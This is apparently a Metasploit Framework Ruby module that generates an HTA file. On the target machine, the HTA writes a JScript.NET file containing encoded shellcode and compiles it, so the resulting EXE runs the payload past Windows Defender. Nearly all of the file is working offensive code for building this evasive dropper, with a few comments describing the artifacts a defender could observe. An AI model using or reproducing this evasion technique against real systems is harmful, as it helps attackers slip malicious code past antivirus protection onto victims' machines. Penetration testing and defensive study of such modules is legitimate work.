rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/windows_defender_js_hta.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
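# Evasion module that renders an HTA file from two ERB templates stored in the
# framework data directory (`exploits/evasion_shellcode.js` and
# `exploits/hta_evasion.hta`) and writes it out through `file_create`.
#
# Defender note: per the module description, the generated HTA writes a
# JScript.NET source file on the host and compiles it there before the
# resulting EXE runs. The on-host compile step and the dropped source/EXE are
# therefore observable artifacts regardless of whether the payload bytes match
# a signature.
class MetasploitModule < Msf::Evasion

  # Registers the module metadata and the FILENAME option.
  #
  # @param info [Hash] metadata passed in by the framework; merged with the
  #   values declared below via merge_info
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',
        'Description' => %q{
          This module will generate an HTA file that writes and compiles a JScript.NET file
          containing shellcode on the target machine. After compilation, the generated EXE will
          execute the shellcode without interference from Windows Defender.

          It is recommended that you use a payload that uses RC4 or HTTPS for best experience.
        },
        'Author' => [
          'sinmygit', # PoC
          'Shelby Pace' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64,
        'Targets' => [ [ 'Microsoft Windows', {} ] ]
      )
    )

    register_options([
      OptString.new(
        'FILENAME',
        [
          true,
          'Filename for the evasive file (default: random)',
          # The random default is computed here, once per module instance.
          "#{Rex::Text.rand_text_alpha(3..10)}.hta"
        ]
      )
    ])
  end

  # Renders the JScript.NET template, base64-encodes the result, renders the
  # HTA template around it, and hands the final text to file_create.
  #
  # Both templates are evaluated with `binding`, so every local variable in
  # this method is visible to them. Local names are part of the template
  # contract: do not rename or remove one without checking both template files.
  #
  # Each template's existence is verified BEFORE it is read. File.read raises
  # Errno::ENOENT on a missing file, so a check placed after the read can never
  # produce the intended Failure::NotFound message.
  def run
    # This is used in the ERB template
    file_payload = Rex::Text.encode_base64(payload.encoded)
    evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')
    fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exist?(evasion_shellcode_path)
    jsnet_code = File.read(evasion_shellcode_path)
    js_file = ERB.new(jsnet_code).result(binding)
    jsnet_encoded = Rex::Text.encode_base64(js_file)
    # This is used in the ERB template
    fname = Rex::Text.rand_text_alpha(6)
    # Falls back to 'anycpu' when the payload's first arch is neither x86 nor x64.
    arch = ['x86', 'x64'].include?(payload.arch.first) ? payload.arch.first : 'anycpu'
    hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
    fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)
    hta = File.read(hta_path)
    hta_file = ERB.new(hta).result(binding)
    file_create(hta_file)
  end
end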